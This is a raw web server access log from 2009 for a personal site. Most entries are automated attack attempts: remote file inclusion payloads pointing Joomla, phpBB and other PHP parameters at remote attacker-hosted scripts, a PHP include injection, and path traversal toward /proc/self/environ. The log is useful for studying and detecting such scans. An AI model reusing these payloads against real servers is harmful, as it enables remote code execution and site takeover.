78.40.224.155 - - [20/May/2009:10:46:23 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 7988 "-" "libwww-perl/5.805" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:23 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:23 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:23 -0700] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:10:46:23 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 7988 "-" "libwww-perl/5.805" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:23 -0700] "GET /logs/access_080720.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:23 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:23 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:24 -0700] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:24 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:24 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:24 -0700] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:24 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:24 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:46:27 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:10:46:34 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:46:34 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 7988 "-" "libwww-perl/5.812" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:35 -0700] "GET /logs/access_090217.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:35 -0700] "GET /logs/access_090217.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:36 -0700] "GET /logs/access_090217.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:46:36 -0700] "GET /logs/access_090217.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:46:40 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:46:40 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:46:42 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
62.141.54.240 - - [20/May/2009:10:46:43 -0700] "GET /logs/access_081113.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.54.240 - - [20/May/2009:10:46:44 -0700] "GET /logs/access_081113.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:46:45 -0700] "GET /logs/access_081130.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:10:46:50 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
210.98.146.166 - - [20/May/2009:10:46:52 -0700] "GET /logs/access_080314.log//?mosConfig_absolute_path=http://www.fair-play-events.com//administrator/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.98.146.166 - - [20/May/2009:10:46:52 -0700] "GET /logs/access_080223.log//?mosConfig_absolute_path=http://www.fair-play-events.com//administrator/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.98.146.166 - - [20/May/2009:10:46:53 -0700] "GET /logs//?mosConfig_absolute_path=http://www.fair-play-events.com//administrator/id1.txt?? HTTP/1.1" 200 100339 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:46:54 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:46:59 -0700] "GET /logs/access_081130.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:47:03 -0700] "GET /logs/access_080512.log%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:47:03 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:47:16 -0700] "GET /?option=com_garyscookbook&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.54.240 - - [20/May/2009:10:47:18 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 200 41996 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:47:18 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:47:26 -0700] "GET /logs/access_080316.log//?option=com_frontpage&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:47:32 -0700] "GET /logs//?option=com_frontpage&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 100339 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.54.240 - - [20/May/2009:10:47:34 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:10:47:46 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:10:47:46 -0700] "GET /logs/access_081104.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:47:47 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
212.150.52.114 - - [20/May/2009:10:47:48 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:10:47:48 -0700] "GET /logs/access_081104.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:10:47:56 -0700] "GET /logs/access_081104.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:10:47:56 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:10:47:56 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:48:00 -0700] "GET /?option=com_frontpage&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 500 292 "-" "libwww-perl/5.803" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:10:48:00 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:10:48:00 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.0" 200 34 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:48:00 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 500 292 "-" "libwww-perl/5.812" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:10:48:14 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:10:48:31 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:48:33 -0700] "GET /logs/access_080219.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:48:33 -0700] "GET /logs/access_080809.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.98.146.166 - - [20/May/2009:10:48:33 -0700] "GET /?mosConfig_absolute_path=http://www.fair-play-events.com//administrator/id1.txt?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:48:44 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 - "-" "libwww-perl/5.812" "www.dmulk.com"
222.122.26.5 - - [20/May/2009:10:49:21 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [20/May/2009:10:49:25 -0700] "GET /logs/access_090217.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [20/May/2009:10:49:25 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [20/May/2009:10:49:25 -0700] "GET /logs/access_080928.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:49:38 -0700] "GET /logs/access_080808.log/index.php?page=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:49:39 -0700] "GET /logs/access_080808.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:49:39 -0700] "GET /logs/access_080808.log/index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:49:40 -0700] "GET /logs/access_080808.log/index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:49:40 -0700] "GET /logs/access_081124.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:49:41 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:49:42 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:49:57 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:49:58 -0700] "GET /logs/access_081124.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:49:58 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:49:59 -0700] "GET /logs/access_080211.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:49:59 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:50:09 -0700] "GET /logs/access_080812.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:10:50:13 -0700] "GET /logs/access_080512.log%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.54.240 - - [20/May/2009:10:50:17 -0700] "GET /logs/access_090308.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:50:17 -0700] "GET /logs/access_081130.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.141.54.240 - - [20/May/2009:10:50:18 -0700] "GET /logs/access_090308.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:10:50:21 -0700] "GET /logs/access_080512.log%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.206.183.148 - - [20/May/2009:10:50:21 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [20/May/2009:10:50:21 -0700] "GET /logs/access_090217.log//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [20/May/2009:10:50:21 -0700] "GET /logs//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:50:22 -0700] "GET /logs/access_080401.log/index.php?option=com_events&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:50:23 -0700] "GET /index.php?option=com_events&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 42109 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:50:25 -0700] "GET /logs/access_080401.log/index.php?option=com_content&task=view&id=141&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:50:25 -0700] "GET /logs/index.php?option=com_events&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.206.183.148 - - [20/May/2009:10:50:26 -0700] "GET /logs/access_080308.log//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:50:26 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:50:28 -0700] "GET /logs/access_080118.log//?option=com_artlinks&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:50:29 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:50:30 -0700] "GET /logs/index.php?option=com_content&task=view&id=141&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:50:32 -0700] "GET /logs/access_081222.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:50:34 -0700] "GET /logs//?option=com_artlinks&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 100339 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:50:35 -0700] "GET /logs/access_081222.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.249.127.15 - - [20/May/2009:10:50:35 -0700] "GET /logs/access_081115.log/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.127.15 - - [20/May/2009:10:50:35 -0700] "GET /xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.127.15 - - [20/May/2009:10:50:35 -0700] "GET /logs/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:50:48 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:50:51 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
72.30.79.60 - - [20/May/2009:10:51:03 -0700] "GET /bikes/dteel/2008_07_03/ HTTP/1.0" 200 835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:10:51:06 -0700] "GET /logs/access_081104.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
